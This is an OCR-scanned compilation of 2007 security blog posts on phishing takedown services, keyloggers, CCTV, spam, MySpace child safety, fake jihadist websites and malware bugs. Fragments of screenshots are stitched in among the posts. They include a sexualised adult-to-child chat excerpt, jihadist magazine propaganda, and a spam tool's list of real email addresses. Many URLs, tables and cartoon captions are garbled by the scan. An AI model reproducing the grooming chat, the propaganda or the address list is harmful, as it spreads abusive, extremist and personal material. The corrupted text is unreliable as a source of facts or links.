online companies logins, even competitors . Financial 

institutions cannot cope with the level of such registered 
domains and some - even after reported to the usual abuse 

account - remain active for weeks to come. So how do you 
protect these businesses and [2]cash in between for 

doing so? [3]Looks like [4]RSA are diversifying their service 
from phishing hosting sites to malware hosting ones : 


EMC's RSA division plans to launch a new service next month 
that will help financial 




















institutions take down Web sites associated with malicious 
Trojan Horse software . The service is planned as an 

extension to the FraudAction phishing takedown service 
already offered by RSA, said Louie Gasparini, co-chief 

technical officer with RSA's Consumer Solutions unit. "We're 
leveraging the same infrastructure we already have in 
place... and now we're focusing our attention on how Trojans 
work," he said. Gasparini said he expects financial 

services companies, auction sites, and online merchants to 
use the service. "It's really allowing the institution to better 
protect its customers," he said. " 

Can RSA really cash in by re-intermediating the current 
communication model, and most importantly do a bet¬ 
ter job? It can sure allow the targeted companies to focus on 
innovation and growth, not on online impersonation 

attacks so I find this a sound product line extension, but 
need more performance stats to offer valuable recommen¬ 
dations. 

According to [5]the latest Anti-Phishing.org report, the 
threatscape looks very favorable in respect to 
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Statistical Highlights for January 2007 


Number of unique phishing reports received in January 
Number of unique phishing sites received in January: 

Number of orands hiiacked oy phishing campaigns In January 

Number of orands composing the top 80% of phishing campaigns in January 

Country hosting the most phishing weosrtes In January 

Contain some form of target name in URL. 

No hostname |ust IP address 
Percentage of sites not using port 80: 

Average time online for site 
Longest time online for site 


24.5 % 
18% 
3.0% 

4 days 
30 days 


29930 

27221 

135 


10 

United States 


communicating with the major country hosting phishing sites 
- the U.S, followed by China and South Korea. In 

between companies diversifying their portfolios of services 
and products, there's one other thing to keep in mind 

and that's how can you achieve the same results in more cost 
effective way than the commercial propositions? And 

can you actually? Do you even have to dedicate financial 
resources to shut down these sites compared to educating 

your customers on how to use their brains? Ask yourself 
these questions before losing it in a [6]budget allocation 

myopia. Something else to keep in mind - ISPs will also start 
getting interested in the idea of equal distribution of 

revenues given the sound business model . 

Related posts: 

[7] The Phishing Ecosystem 

[8] Anti-phishing Toolbars - Can You Trust Them? 

[9] Google's Anti-phishing Black and White Lists 

1. http://ddanchev.blo as pot.com/2QQ6/12/phishin a -domains- 
hostin a -multiple.html 











2. http://www.rsa.com/node.aspx7id = 3020 


3. 

http://www.rsa.com/exoerience/consumer/fraudAction new 5 
■ html 

4. 

http://www.infoworld.com/article/07/03/15/HNrsatro i antaked 
own l.html 

5. 

http://www.antiphishin a .or a /reports/apw a report January 20 
07.pdf 

6. http://ddanchev.blo as pot.com/2006/07/bud a et-allQcation- 
mvo pia-and.html 

7. http://ddanchev.blo as pot.com/2007/02/ohishin a- 
ecosvstem.html 

8. http://ddanchev.blo as pot.com/2006/03/anti-ohishin a- 
toolbars-can-vou-trust.html 

9. http://ddanchev.blo as pot.com/2006/Q9/ a oo a le-anti- 
phishin a -black-and-white.html 
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Ghosts in the Keyboard (2007-03-27 22:31) 








































KeyGhost is a nasty type of [l]hardware keylogger that if 
ignored as a concept can truly expose a lot of data, with 


one downsize - the logged data has to be retrieved physically 
in the very same fashion the keylogger got installed. 

Here's [2]how the six-year-olds do it: 


A six-year-old girl has successfully hacked into the UK 
Parliament's computer system, installing a keylogger onto an 

MPs machine. Guildford MP Anne Milton agreed to leave her 
computer unattended for 60 seconds as part of a test 

of House of Commons IT security by the BBC's Inside Out 
programme. Brianagh, a schoolgirl from Winchester, took 

just a quarter of that time to install the keylogging software 
without being noticed. Such easily available applications 
record all the keystrokes made on a machine and can 
therefore be used to steal passwords, financial data and 

personal information. 11 

The article starts by mentioning the software and ends up 
with a quote on the "device" itself. The story is a great wake 
up call, especially the six-year-old girl part, as it will position 
the computer system's security as an 

extremely weak one in the minds of the masses, no wait the 
tax payers. But age doesn't really matter here, it's the 

idea that the majority of insecurities have an outside- 
towards-inside trend, namely they come from the Internet, 
not 



[3]from within as [4]we see in this case. In case you're 
interested, there're already various business development 

activities in releasing a [5]laptop based PCI card keylogger 
given the obvious incompatibilities with a PC. 

Related posts: 

[6] USB Surveillance Sticks 

[7] Espionage Ghost Busters 

1. http://www.ke va host.com/ 

2. http://www. pc pro.co.uk/news/108769/sixvearold-installs- 
kevloaa er-on-mps-computer.html 

3. http://ddanchev.blo as pot.com/20Q5/12/insiders-insi a hts- 
trends-and-possible.html 

4. http://ddanchev.blo as pot.com/2006/Q3/old- ph vsical- 
securitv-threats-still.html 

5. http://www.tech2.com/india/news/laptops/lapto p- 
hardware-ke vloaa er-in-min s- pci-card/4560/0 

6. http://ddanchev.blo as pot.com/2007/Q3/usb-surveillance- 
sticks.html 

7. http://ddanchev.blo as pot.com/2006/05/espiona ae-a hosts- 
busters.html 
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You've Got Something in Your Eye (2007-03-27 22:53) 

Or that's what the always getting bigger, [l]Big Brother says 


Avigilon's 16 megapixel cameras are the first surveillance 
cameras that can continuously monitor large fields of view 

while maintaining high levels of detail. In the past, security 
professionals have had to rely on opto-mechanical PTZ 

cameras for wide field of view surveillance and were forced to 
make a tradeoff between field of view and image 





detail. Avigilon's 16 megapixel cameras provide a superior 
solution for post incident investigation because they 

provide detailed images of the entire field of view, without 
the requirement of an operator to control the camera. 11 

I like the press release debunking the idea of real-time 
incident prevention due to CCTV surveillance compared to 

historical performance and analyzing [2]past events. Not 
that's it's not possible, but [3]the investments are not 

worth the ROI, and if self-regulation is the single most visible 
return on investment here, that's a bad deal. But 

in reality, keep on living in a CCTV myopia world, where 
covering the "blind spot" of one camera gets covered by 
installing another one, and the "blind spot" of the second one 
gets covered by a third one. It's about time your CCTV 

expenditures start declining given reasonable metrics 
defining a successful investment appear soon. 

Now let's hope these [4]cameras never get installed in public 
restrooms, shall we? 

1 . 

http://www.avi a ilon.com/compan v/ press/16Me aa oixelwithDi a 

iialPTZ.htm 

2. http://ddanchev.blo as pot.com/2006/08/bi a -momma- 
knows-best.html 


3. http://www.csoonline.com/read/090105/roi 3826.html 

4. http://ddanchev.blo as pot.com/2006/Q6/bi a -brotheNn- 
restroom.html 
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Real Time Spam Shredding (2007-03-28 14:14) 

Wednesday's portion of hahaha-ing. This is the work of a 
pragmatic genious, [l]the revenge of the nerds or call it 

whatever you want the idea is simple - what gets detected as 
spam gets printed and shred in real-time for interactivity. 














How much would it cost for a Fortune 500 organization to 
implement such a feature, a "fortune" by itself for sure, but 
an anti-spam vendor looking to differentiate its headquarters 
might be interested in implementing such a system 

for their corporate clients to see while walking around. 


Spamtrap" is an interactive installation piece the prints, 
shreds and blacklists spam email. It interacts with spammers 
by monitoring several email addresses I have created 
specifically to lure in spam. I do not use these email 
addresses 

for any other communication. I post individual email 
addresses on websites and online bulletin boards that cause 

them to be harvested by spambots and then to start 
receiving spam. Because I know that all email sent to these 

email addresses are spam, I have set the installation to print 
and then shred each email as it arrives. " 

182 

[2]Read more about the Spamtrap in this blog. There's simply 
so much spam these days, you can even create large data 
sets in order to [3]render surrealistic spam art paintings, no 
kidding. 

1. http://billshackelford.com/home/portfollio soamtra 826 

2. http://billshackelford.com/home/blo a 

3. http://ddanchev.blo as pot.com/2006/Q7/beautv-of- 
surrealistic-spam-art.html 
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childl ^3 adultl 

" horn y 


10/18/06 at 11:15PM 

"adult 1" 

childl. 1 like 2 plan stuff.kinda a neatfreek lol 

Considered 

adult l lol....Saturday probably during the night if that's 

Very 

ok 

childl. thas fine.like 7 mebbe? 

Dangerous 

adultl yeah sounds good 

childl: kewl.7 ill have plenny of time 2 clean up an 

bssed on 19 votes 

How concerned should other 
parents be about this user? 

stuff.. :D 
adultl: ;) 
childl ;;) 

adultl hey 1 gotta go now 

& & <S> & <3 

adultl do you feel horny at all? 

childl a lil.but 1 g2g 2 bed soon 

adultl. ok I'll talk to you tomarrow ok 
childl: Okies :* 

Archive without vote 



IMSafer Now MySpace Compatible (2007-03-30 00:25) 

MySpace, the world's most popular social networking site, 
and an online predator's dream come true has been 

actively discussed since the very beginning in respect to the 
measures News Corp's property takes to prevent child 

abuse through the site. Let's face the facts, of course 
underaged kids will confirm they're over 18/21 in order to 

use the site, and of course online predators will continue 
finding ways to socially engineer a online contact with the 
ultimate idea to meet in the physical world. Why? Because 
children provide way too much sensitive information in 


order to virtually socialize and meet new buddies, thus 
indirectly helping pedophiles pinpoint key "contact points" in 









the future. If you as a parent start paranoia-ing around, you'll 
end up with the wrong conclusion that the risks are 

not worth the benefits, totally forgetting that forbidden fruits 
taste much better and it's children we're talking about 

- they break the established rules in principle. No matter the 
registration procedures in place, you cannot stop an 

[1] online predator registering and communicating with 
children at the site, what you can do however is educating 

your children, and emphasizing on filtering not spying 
activities in order to protect them. 

The team behind IMSafer, a service which I covered in a 

[2] previous post, have realized the potential benefits 

of [3]introducting a MySpace compatibility, and so it recently 
became a reality : 

11 IMSafer's updated language-analysis engine can scan 
individual MySpace postings for potentially dangerous, 

threatening or sexually explicit content, the company said. 
Users can download the tool from the company's [4]Web 

site , said Brandon Watson, CEO and founder of the 
company. Traditional parental control software generally can 
filter and block Web sites but can't identify possible 
dangerous interactions on increasingly popular social 
networking sites such as MySpace, he said . While most 
sexual solicitations of children still come through instant 
messaging 

software, online predators are increasingly using MySpace to 
initiate contact with potential victims, Watson added. 11 



Don't forget the bottom line, if you're in a fragile relationship 
with your kids, pretty much anyone online could take 
advantage of their vulnerable condition. The irony goes that 
people you've never met will show more respect to you 

than the people you actually fight to get respect from. From a 
children's perspective that's you parents! [5]Here are 

several more [6]articles worth going [7]through, especially 
this [8]post-event response to what's an internal problem 
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to me. 

1. http://ddanchev.blo as oot.com/2QQ6/lQ/re a istered-sex- 
offenders-on-m vs pace.html 

2. http://ddanchev.blo as pot.com/2QQ6/lQ/filterin a-a ood- 
a irls-and-im-threats.html 

3. http://www.computerworld.com/action/article.do? 
command=viewArticleBasic&articleld = 9013959 

4. http://www.imsafer.com/ 

5. http://www.forbes.com/securitv/2006/12/19/m vs pace- 
securitv-safetv-tech-securitv-cx II 1220rn vs pace.html 

6. http://www.csoonline.com/read/0301Q7/fea m vs pace.html 

7. 

http://www.cbsnews.com/stories/2007/03/13/tech/main2563 

414.shtml 


8. http://www.forbes.com/securitv/20Q7/01/18/m vs pace- 
lawsuit-assault-tech-securitv-cx II Q118m vs pacesuit.html 
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In this Issue. 

Cover Story: 

Usurpation 

of Iraq 

Editorial 

The Muslim 

Nation 
does not 
concede to 

defeat 

Local Affairs: 

A .'sr. thrt 


The Muslim Nation does not 
CONCEDE TO DEFEAT 





Jlronnd the Worn 


Following the destruction of the Soviet Union 
at the hands of the Mujahideen in Afghanistan, 
the US administration started to assume a more 
aggressive stance in its international policies, 


Afghanistan 

Al-Muslimah 


As a result, they launched a crusade on 
Afghanistan, and then claimed a so-called 
victory over Taliban's Islamic Emirate, eliminating 
the rule of Shari'ah and replacing it with a 
puppet anti-Islamic government that showered 
the Afghani people with promises of a better life 
and freedom, 


Australia - New 

Anti-Terror Laws 

Iraq: Resistance to 

the crusade- 

occupation 


Cyber Traps for Wannabe Jihadists (2007-03-30 00:50) 


I guess that's what happens when you don't have a single 
clue on where the real conversation and recruitment is 


happening, so you decide to [l]create your own controlled 
jihadi communities to monitor. A case study on false 

feeling of effectiveness in Australia : 

" FEDERAL police are setting up bogus jihadist websites to 
track extremists who use cyberspace to recruit fol¬ 
lowers and plan attacks. The undercover operation, disclosed 
yesterday by Australian Federal Police Commissioner 

























Mick Keelty, is an assault on arguably the most powerful 
weapon of the global jihadist movement, the internet. Mr 


Keelty said police were working closely with foreign 
governments and the military's Defence Signals Directorate. 


We have worked with some foreign countries through our 
undercover program, establishing our own websites, to 

capture some of the activities that are going on on the 
internet," he told a security conference in Sydney. 


"Some of the activities" will have absolutely nothing to do 
with the real situation, and even if someone bothers to open 
up a discussion on your second hand jihadi site, it'll be a 
classic example of a moron. Fighting for a share of the online 
jihadi traffic is so unpragmatic, unnecessary, time and 
resource consuming that you'd better rethink the entire idea, 
emphasize on intelligence data sharing with other countries 
in case you cannot monitor the emergence 

of local communications, and keep an eye on them. 

Meanwhile, a talk on the street is heating up : 

- Hello underaged kids, I see you're having trouble getting 
hold of some quality Russian vodka over here in front of 

that store, I can probably give you hand with this? 

- Yes, please, please!!! 

- Aha! Agent Temptation from the [2]Thought Police here, 
you're busted for desiring to drink alcohol even without 
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drinking it! Put your tongues on your head so I can see them! 

In the long term we may actually have a real-life bomber 
confessing of visiting online jihad community before 

the plot took place, that, ooops, happens to be one of the 
fake ones. Now we have double ooops. [3]Many 

other [4]related posts to [5]provide you [6]with an 
[7]overview of the [8]big picture and a [9]countless number 
of 

[lOjbudget allocation myopia failures that emphasize on 
technological approaches to [lljdetecting radical jihadi 

propaganda, whereas [ 12]cyber jihadists and future terrorists 
are getting efficient in generating "noise sites", ones your 
crawlers are so good at picking up. 

1 . 

http://www.thea a e.com.au/news/national/PQlice-set-up-cvber- 

tra p-for- i ihadists/2007/02/26/1172338550906.ht 

ml 

2. http://en.wikipedia.or g /wiki/Thou a ht_Police 

3. http://ddanchev.blo as pot.com/20Q7/Q2/terrorism-and- 
encr v ption.html 

4. http://ddanchev.blo as pot.com/2007/Q2/characteristics-of- 
islamist-websites.html 

5. http://ddanchev.blo as pot.com/20Q7/01/preventin a- 
massive-al-aaeda-cvber.html 

























6. http://ddanchev.blo as oot.com/2007/02/forensic- 
examination-of-terrorists-hard.html 


7. http://ddanchev.blo as pot.com/2006/08/ste a ano araohv- 
and-cvber-terrorism.html 

8. http://ddanchev.blo as pot.com/2006/12/current-state-of- 
internet- i ihad.html 

9. http://ddanchev.blo as pot.com/20Q6/12/full-list-of- 
hezbollahs-internet-sites.html 


10. http://ddanchev.blo as pot.com/2006/Q9/hezbollahs-dns- 
service-oroviders-from.html 

11. http://del.icio.us/DDanchev/Cvberterrorism 

12. http://ddanchev.blo as pot.com/20Q6/12/analvsis-of- 
technical-mu i ahid-issue-one.html 
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2.4 

April 
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Cyberpunk is Dead! (2007-04-01 20:29) 

Yeah sure, on the [ 1 ] 1 st of April only! Enjoy this marvelous 
cyberpunk compilation with [2]Juno Reactor as a 

background music. A group whose works such as Pistolero 
and Rotor Blade continue reminding me of the good old 

school psychedelic vortexes we used to spin in - that's of 
course in a previous life. 




























[EMBED] 

1. http://en.wikipedia.or g /wiki/April Fools%27 Da y 

2. http://en.wikipedia.or g /wiki/ l uno_Reactor 
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Art ic in 



muanojiycos es| Status contacted hosting 
usuarlo* lycos os) Not* Added: 0000833 
.usuanos.tycotet) Status: verified -» contacted hosting 
usuanos lycos es| Note Added OOOQB29 
...usuanoAlycoves) Status: unverified -» vended 
- .usuanos lycos,es| New Attack 


resolved (monitoring) 


Date • 


200T-03-01 12i31 
2007-03-01 12 22 
200703-01 12:20 
20070301 1202 
20070 301 12 02 
20070301 1154 


Taking Down Phishing Sites - A Business Model? 
(2007-04-04 13:46) 

[l]Processing orders for taking down malicious or fraudulent 
web sites is gaining grounds with not just RSA providing 

the service, but also, with [2]Netcraft joining the process : 

11 Netcraft will identify, contact and liaise with the company 
responsible for hosting the fraudulent content. 

Netcraft enjoys excellent relations with the hosting 
community, and many of the world's largest hosting 
companies 

are Netcraft customers. Netcraft can exercise its existing 
relationships with these companies to provide a swift and 

smooth response to the detection of the site. If the hosting 
company is reputable, this may be sufficient to ensure a 

prompt end to the fraudulent activity. However, some hosting 
companies offer fraud hosting as a service whereby 


















they are incentivized to keep the site up as long as possible, 
and this necessitates more extensive action. 11 

How does Netcraft differentiate its value proposition 
compared to RSA's? Netcraft's core competency is moni¬ 
toring of web sites and providing historical perforce reports 
regarding various server variables, and they've been 

doing it for quite some time. Moreover, the company directly 
relies on the success of its anti-phishing toolbar in 

respect to gathering raw data on new phishing sites, thus, a 
future customer in the face of company whose brand 

is attacked. While the business models seem sound to some, 
it's worth discussing their pros and cons. Will ISP 

implement an in-house phishing sites monitor to compete 
with the services offered by third-party vendors - they 

could definitely delay their actions given the huge 
infrastructures they monitor and the lack of financial 
incentives 

for the timely shut down - or will ISPs and vendors figure out 
a way to build an ecosystem between themselves? 

The pioneer advantage is an important despite the common 
wisdom that even if you have an innovative idea and a 

market that's not ready to embrace it it wouldn't get 
commercialized. 

In the past, there were [3]futile attempts by banks to utilize 
the most commonly abused phishing medium - 



the email - to build awareness among their customers on the 
threats of phishing which isn't the way to solve 

the problem. You've got many options in respect to your 
customers - either educate them, enforce [4]E-banking 

best practices or deny them the service if they don't comply, 
be a paper tiger and forward the responsibility for 

fraudulent transactions to their gullibility, or improve the 
entire authentication process. As we have seen two-factor 
authentication may improve consumer's confidence, but 
[5]we're also seeing [6]malware authors getting pragmatic 

and [7]adapting to the process as well. Flexibility also stands 
for better transparency of the process - respect to the banks 
providing me with the opportunity to receive an SMS each 
and every time money come and go out of the 

account. 

[8]OPIE and [9]multiple factor authentication are inevitable, 
but a [10]customer's awareness of the threat is 

worth more than another keychain of OPIE generators. The 
rest are [ll]unmaterialized E-commerce revenues due 

to customers still fearing the risks are not worth the benefits. 

1. http://ddanchev.blo as pot.com/20Q7/Q3/take-this- 
malidous-site-down.html 

2 . 

http://news.netcraft.com/archives/2007/03/3Q/phishin a site 
takedown countermeasures.html 

3. http://ddanchev.blo as pot.com/2006/Q4/headin a -in- 
op posite-direction.html 













4. http://ddanchev.blo as pot.com/2006/05/no-anti-virus- 
software-no-e-bankin a .html 

5. http://ddanchev.blo as pot.com/2007/Q2/phishin a- 
ecosvstem.html 

6 . 

http://www.hispasec.com/laboratorio/bankin a _tro i an_capture 
video cli p.pdf 
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7. 

http://www.svmantec.com/avcenter/reference/threats.to.onlin 

e.bankin a.pdf 

8. http://ddanchev.blo as pot.com/2006/Q8/one-time- 
password- a eneratin a -credit.html 

9. 

http://www.zdnet.com.au/news/securitv/soa/SMS securitv for 
NetBank users/0 . 130061744 . 339274518 . 00.htm 

10. http://www.us- 

cert. a ov/read in a room/Bankin a SecurelvOn I ine07102006 . p 
df 

11 . 

http://www.infoworld.com/pdf/special report/2006/18SRmalw 
are. pdf 


191 










































Kevin & Kell 


C200J, Bill Holbrook 


Buy the books at wvvw.plan't org 


rM th® Wit**-) of me 

fvizwEfz p«^ipe*ir of 
-TMt CPiWTtfV' 
♦V'lAtSr^A 


I HAM A PgoftTfiS Lf 
i^OpK AT-Honftt BUSINESS, 
SEUIH6 (Ml.l»)£ COlUGe 
P£ 6rf*g5 /fJ PMPM- 
CepTiCAt-i AtJp 00t?Y 
£r)LA£G€MEATs. 



I uvte OfJ 
Wifiren wk 
vfiwie* it) rut 
fpiotl op 'smgies; 

Hepe'i mi/ 

;i t 

—-- Id) zS 



...WHV APE 
MV £-MAILS 
geiHfr 
gLOf-KEP? 


rr ^ 

MF SHE'5 
LE6IT, 1 
FEEl. 
E-0R2V 
ftJfc 



Interacting with Spam Emails (2007-04-04 14:16) 


Unbelievable, and you wonder why is spam on the verge of 
destroying email as the once so powerful communication 


medium. What I don't like about survey's like these is that 
they barely report their findings without providing further 
clues on the big picture and actually assess the findings in 
the way they should. The ultimate question thefore always is 
- So What?! Interacting with spam in any way, be it clicking 
on a link inside the email, loading the bugged with 


remote images emails, and the most moronic of them all - 
unsubcribing from the spammer's URL will only result in 


verifying that your email is active . What follows is a 
syndication of this email by different spammers and a flood 
of advertisements in languages [ 1 ]you'II probably never 
speak : 


11 Bombarded by spam, e-mail users are eager for tools like a 
"report fraud" button that would help weed out unwanted 
messages that litter inboxes, according to a survey by the 
Email Sender and Provider 


Coalition released on Tuesday. More than 80 percent of e- 
mailers already use tools such as "report spam" and the 
"unsubscribe" button to manage their in-boxes, the survey 


















found. The survey, which was also conducted by marketing 
research firm Ispos, polled 2,252 Internet users who access e- 
mail through service providers such as AOL, 

MSN/Hotmail, Yahoo! and Gmail. 11 

Having a report spam button means the technological 
measures in place to prevent the spam from reaching a 

mailbox have failed, a very bad sign by itself. Before asking 
for a report spam button [2]understand how spammers 

obtain [3]your email at the first place and try to prevent it. 
Standardizing the "report spam" button on multi-vendor level 
would never happen. That's mainly because vendors actually 
compete on spam detection results, just like they 

should do with the idea that competition not only keeps 
them in a good business shape, but has the potential to best 

serve the customer. 

There's also the mean wisdom of crowds to keep in mind. 
Remember when [4]Hotmail was blocking Gmail 

invites? 
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Geographic Location 
IP Characteristics 


1*1 Canada (Scarborough . Ontario) 
Blocklisted By: SpamHaus 


Harvester First Seen 
Harvester Last Seen 
Harvester Sightings 
Harvester Results 

User-Agents 

Time From Harvest 
To First Spam 


approximately 2 years, 5 months, 1 week ago 
within 3 months, 3 weeks 


[3,237 visit(s) to 778 honey potfs 


5 message(s) resulting from harvests 
0.09% of harvests result in messages 

seen with 1 user-agent(s) 

Fastest : 2 days, 19 hours, 16 mins, 42 secs 
Slowest : 11 months, 14 hours, 30 mins, 10 secs 
Average: 3 months, 3 weeks, 2 days, 8 hours, 4 mins, 2 
secs 

Std Dev: 6 months, 1 week, 1 day, 12 hours, 34 mins, 32 
secs 


lociated Mail Servers_| Harvester's Claimed User Agents 


209.167.50.21 1*11 1 LinkWalker | 


IPs In The Neighborhood 


209.167.50.21 (S) 


Was it an undercover corporate policy, or Hotmail fans were 
clicking the report spam button on received Gmail invites 

to make sure Hotmail subscribers never get the chance to 
receive them? Empowering the massess in a Web 2.0 

windom of crowds style is tricky, as the way competitors click 
on each other's AdSense ads during lunch breaks, the 

very same way they'd subscribe to a competitor's email 
notifications and have them reported as spam. Contribute to 

[5]Project Honeypot if your infrastructure allows you to and 
see them crawling. Cartoon courtesy of Bill Holbrook. 

1 . 

http://news.vahoo.eom/s/nm/20070327/tc nm/email soam d 
c 




























2. http://ddanchev.blo as pot.com/2006/Q9/email-spam- 
harvestin a -statistics.html 


3. http://ddanchev.blo as pot.com/20Q7/01/inside-email- 
harvesters-confi a uration.html 

4. http://slashdot.or g /article.pl7sid = 04/06/21/1150236 

5. http://www.oro i ecthone v pot.or g /statistics. php 
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Hijacking Your Fear (2007-04-04 15:28) 





























Have no fear, the [l]toxoplasma gondii parasite is here. Just 
like a decent piece of malware exploiting a zero day 

vulnerability in an anti virus software, shutting it down or 
making sure it cannot obtain the latest signatures while 

totally ignoring the host's firewall, this [2]parasite controls 
the fate of rats and mice in a targeted nature : 


by hijacking the part of the brain that makes the rodents 
naturally fear cats, a new study show. The exquisite 

precision leaves intact all other neurological mechanisms for 
learning to avoid danger, so the rodents learn to survive all 
hazards except being eaten by cats - the only form of death 
beneficial to the parasite. 11 

Very interesting example of targeted attacks on a rat's brain 
courtesy of mother Nature's ghost-hacking capa¬ 
bilities. Just a whisper in my ghost - hope the parasite doesn't 
become cats-compatible and have them fear the 

mice. 

1. http://en.wikipedia.or g /wiki/Toxoplasma_ a ondii 

2. http://www.newscientist.com/article/dnll516-parasite- 
hii acks-brains-with-sur a ical-precision.html 
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Lie Detecting Software for Text Communications 
(2007-04-09 17:10) 

The art of money wasting when there's a surplus of research 
grants and no one to pick them, or [l]a product concept 

myopia? $680,000 have been awarded by the U.S National 
Science Foundation to software developers to come up 

with a [2]lie detecting software for email, IM and SMS 
messages : 

11 There's still an open question of whether that is actually 
possible or not," [3]said Jeff Hancock , a communications 
professor and information science faculty member at Cornell. 
"Our research suggests that it is." Passive voice, verb tense 
changes, and even noun or verb selection can suggest a 
person is lying, he said . Hancock said another 


indicator of written deception is the decreased use of the 
word "I," which is most likely an attempt to create distance. 





"One of the reasons we think that works as an indicator is 
that pronoun use is subconscious," he said. In interactive 
speech, like instant messaging and some dialogues, liars go 
into a "persuasive mode" and increase the length of their 
message by 30 % to describe and explain situations, he said. 
Other factors - such as individual beliefs about behavior, 
whether someone is accused of something or interacting with 
an accuser - can complicate the proces. " 

Lies are creative even in a written form compared to the 
favorable body jestures that [4]speak for themselves. And I 

don't really think an alert such as "the suspect's talking too 
much on a one sentence question" would do any good. It's all 
about doing your homework, having experience, not being 
naive and the power to remain silent when someone's 

lying to you - lying pattern intelligence gathering . On the 
other hand, the product concept myopia is a situation 

where a company falls in love with their product or service 
and establish the "build it and they'll come" mentality even 
without bothering to assess whether or not the market's 
environment is willing to embrace it, can afford it, or 

actually need it. The less market transparency, the better for 
the company, the better the market transprancy the 

better the puchasing decision of the customer who'll realize 
that the solution doesn't have to be in the form of the 

offered product. My point is that, despite the need for the 
detection of lies of text communications, the solution may 
not come in the form of talk pattern detection, for instance, 
your overhyped lover tells you he's in Paris, but geolocating 
your communicating with him you see he's in Frankfurt, and 
what a coincidence that is since his ex also lives there. 
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Using [5]Enron, the infamous [6]case study that'll be 
discussed in business school for years to come is a good 
analogy. But just because you think you've established a 
pattern of communication - lies - in conversations that are 

fake by default, doesn't mean you'll be able to build the 
dynamics of lying into a detectable pattern. Detecting lies 

on the fly remains futile for the time being, and you really 
don't need a program to tell you if someone's lying to 

you especially in a written form. Outsmart them, act like you 
don't know to get intelligence on their lying pattern 

, remain silent for a short timeframe, they'll lie again, be 
prepared and hopefully you'll recognize a new pattern. 

Enron's past communication shouldn't be the benchmark in 
this case, try some [7]Fool's day press releases like this 

[8]PirateBay announcement for finding a permanent hosting 
solution - in North Korea! Average people's patterns are 

the same, therefore pretend to be a moron when you're most 
knowledgeable, and pretend to be weak when you're 

most strong and I guarantee you a quick reboot of your 
relationships. 

The lines between sarcasm and a lie are getting even more 
blurred these days. 

1. http://en.wikipedia.or g /wiki/Marketin a m vooia 

2 . 

http://www.informationweek.com/software/showArticle. i html? 







articlelD=198701103 


3. http://www.cis.cornell.edu/hancock.htrnl 

4. http://ddanchev.blo as pot.com/20Q6/ll/how-to-tell-if- 
someones-lvin a -to-vou.html 

5. http://ddanchev.blo as pot.com/2006/Q9/visualizin a -enrons- 
email.html 

6. http://ddanchev.blo as pot.com/2006/06/there-vou- a o-with- 
vour-financial.html 

7. http://en.wikipedia.Or g /wiki/April_l . _2007#ln_websites 

8. http://slashdot.or a /article.pl? 
sid = 07/04/01/1342236&from = rss 
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Month of Malware Bugs Coming (2007-04-10 14:47) 

This will prove to be [^interesting as it's directly related with 
a previous discussion on [2]hijacking or shutting down 
someone else's botnet through exploiting vulnerabilities in 
their code : 

11 During each day of the Month of Bug Bugs McAfee Avert 
Labs will provide analysis of flawed malicious code 



























(aka bugs). These are viruses that don't spread, password 
stealing Trojans that can't leave the stable, drive-by attacks 
that crash and burn, phishing attacks that phlop, denial of 
service attacks that are denied, etc. Our analysis will 

highlight the errors made by authors, and show how these 
threats can be fixed and in most cases optimized for 

maximum potency. 11 

Have you ever imagined that as a pen tester or security 
consultant you'll have to exploit XSS vulnerabilities in 

a botnet's web C &C in order to take a peek inside? Botnet 
polymorphism in order for the botnet to limit the 

possibility of establishing a communication pattern - an 
easily detectable one - is just as important as is the constant 
diversification towards [3]different communication platforms. 

Despite that malware authors are consistently 

creative, and efficiently excelling at being a step ahead of 
the security measures in place, they're anything but 

outstanding programmers, or at least don't put as much 
efforts into Q &A as they could. Aren't malware coders 

logically interested in [4]benchmarking and optimizing their 
"releases", do they have the test bed in terms of a virtual 
playground to evaluate the effectiveness of their code, or are 
they actually enjoying a "release it and improve it on the fly" 
mentality? It's all a question of who the coders are, and how 
serious are their intentions. 

In a [5]very well structured paper courtesy of Symantec, the 
author John Canavan looks are various bugs in popular 



malware such as the Morris worm, Sobig, Nyxem, OSx.Leap, 
as well as Code Red Worm, W32.Lovgate.A@mm, 

W32.Logitall.A@mm, VBS.SST@mm, VBS.Pet Tick.N, 

W32.Beagle.BH@mm, W32.Mytob.MK@mm. Rather interest¬ 
ing fact about the much hyped Nyxem : 

" However something that was overlooked in a lot of reports 
at the time was this bug in the code, which 

meant 

that the worm would not overwrite files on the first available 
drive found. For example if the first available drive is the C 
drive, the worm will overwrite files in available drives from D 
to Z. 


Looking forward to seeing the bugs due to be highlighted in 
the MoBB. 

1. http://www.avertlabs.com/research/blo a/? p = 239 

2. http://www.linuxsecuritv.com/docs/malware-trends.pdf 

3. http://ddanchev.blo as pot.com/20Q7/Q3/botnet- 
commumcation-platforms.html 

4. http://ddanchev.blo as pot.com/2QQ6/Q9/benchmarkin a- 
and-optimisin a -rnalware.html 

5. 

http://www.svmantec.com/avcenter/reference/me.code.write. 

a ood.pdf 
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Shots from the Malicious Wild West - Sample Four 
(2007-04-10 15:16) 

My previous "shots" related to various pieces of malware, 
packers, or on the fly malicious URL analysis will continue to 
expand with the idea to provide you with screenshots of 
things you only read about, but never get the chance to 

actually see. In the first shot I discussed [l]ms-counter.com, 
in the second the [2]Pohernah crypter, and in the third 

[3]The Rat! Keylogger. You may also find a recent post related 
to the [4]dynamics of the underground's economy, as 

well as the related screenshots very informative. 

In this virtual shot I'll discuss the [5]High Speed Verifier, a 
commercial application spammers use to filter out 

the fake and non-existent emails in their spam databases in 
order to not only achieve a faster speed while sending 

























their message out, but also improve the quality of their 
databases which I love poisoning so much. What the High 

Speed Verifier all about? As its authors state : 

11 HSV detects about 20-30 % of invalid addresses in a 
mailing list, though theoretically it is possible to detect up to 
60-70 % using a software product. This figure seems 
relatively small, but actually it might make 10 % of a list. 

Besides, HSV provides for optimal checking mode in terms of 
time and data traffic. More thorough checking (with 

which the rest 40 % of invalid addresses could be detected) 
takes 10 times longer and requires 5 times greater traffic for 
each address, hence it's not that advisable with huge lists. 11 

So once [6]emails are harvested, they have to be verified and 
then abused for anything starting from [7]phish- 

ing attacks to good old fashioned [8]social engineering tricks 
decepting users into executing malware or visiting a site for 
them to do so. Don't get too excited, the [9]advanced version 
has even more interesting features : 
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25 W.tst - Advanced Maillist Verify 



| File View Check Help 

: u ooo ss £ 3 \ 

3 a ft 


Processed Emails Result 

Comment 

r*l 


sales@coffeecup.com 
^1 reseller@coffeecup.com 
M specials@coffeecup.com 
M Support@maxxchat.com 
fchen0000@usa.net 
vt smud@twyst.org 
kindaichi@usa.net 
tvd robyrobo@usa.net 
SI matro@usa.net 
SI Jon2002@usa.net 
■Jf\ slimticker@usa.net 
Jgi biggieboysoft@usa.net 
